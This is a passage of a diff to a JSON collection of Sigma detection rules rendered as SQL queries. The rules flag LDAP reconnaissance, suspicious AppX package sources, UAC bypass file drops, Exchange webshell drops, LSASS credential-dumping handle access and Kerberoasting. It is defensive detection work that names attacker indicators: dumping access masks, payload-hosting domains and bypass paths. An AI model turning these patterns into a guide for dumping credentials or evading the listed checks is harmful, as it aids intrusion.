'%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + ], + "filename": "win_ldap_recon.yml" + }, + { + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Office Macro File Creation", - "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion" ], "falsepositives": [ - "Very common in environments that rely heavily on macro documents" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_office_macro_files_created.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1554" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "VSSAudit Security Event Source Registration", + "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_security_vssaudit_secevent_source_registration.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' 